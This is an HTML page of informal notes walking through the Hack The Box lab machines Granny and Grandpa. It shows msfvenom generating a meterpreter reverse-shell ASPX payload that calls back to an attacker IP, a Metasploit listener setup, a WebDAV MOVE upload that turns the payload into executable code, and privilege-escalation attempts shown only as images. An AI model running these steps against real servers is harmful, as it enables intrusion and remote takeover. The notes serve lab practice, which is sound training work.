<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Granny and Grandpa</title>
</head><body><span style="font-size: 14pt">Grandpa 10.10.10.14<br/>
Grany &nbsp; &nbsp; 10.10.10.15<br/>
<br/>
On Grany:<br/>
<br/>
Block Access to Grandpa<br/>
<br/>
iptables -L #To list all the rules<br/>
<br/>
iptables -A OUTPUT -d 10.10.10.14 -j DROP #drop outgoing traffic to Grandpa<br/>
<br/>
Running Nmap scan -&gt; Server Type: Microsoft-IIS/6.0 which is from 2003 if we do a google search<br/>
<br/>
gobuster and nikto also being ran in the background <br/>
<br/>
dav server is running so we do dav test -&gt; davtest -url http://10.10.10.15<br/>
<br/>
msfvenom -l | grep windows #grep for windows payloads<br/>
<br/>
msfvenom --help-formats # to see if it supports aspx<br/>
<br/>
output shows it supports aspx<br/>
<br/>
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.4 LPORT=1337 -f aspx<br/>
<br/>
msfconsole #for starting a listner<br/>
use exploit/multi/handler<br/>
set LHOST tun0<br/>
set LHOST tun0<br/>
set LPORT 1337<br/>
set payload windows/meterpreter/reverse_tcp <br/>
exploit -j <br/>
<br/>
After we googled MOVE HTTP method we got this:<br/>
MOVE /ippsec.html HTTP/1.1 #adding this through burp suit to move the file to the server<br/>
Destination: /ippsec.aspx<br/>
<br/>
<br/>
<img src="image.png" /><br/>
<br/>
In Browser we execute:<br/>
10.10.10.15/ippsec.aspx<br/>
<br/>
Finally we get reverse shell on our listening meterpreter session.<br/>
<br/>
<img src="image 2.png" /><br/>
<br/>
ctrl+z to background a meterpreter session <br/>
<br/>
Now we gather information on exploits for priv esc for this box using suggestor:<br/>
<img src="image 3.png" /><br/>
<br/>
<br/>
List of exploits:<br/>
<img src="image 4.png" /><br/>
<br/>
<br/>
Running one of the exploit but doesn't work:<br/>
<br/>
<img src="image 5.png" /><br/>
<br/>
<br/>
Runnung another exploit but it dont work either:<br/>
<br/>
<img src="image 6.png" /><br/>
<br/>
<br/>
Now we run another exploit and this time it worked! -&gt;<br/>
<br/>
<img src="image 7.png" /><br/>
<br/>
<br/>
<br/>
</span></body></html>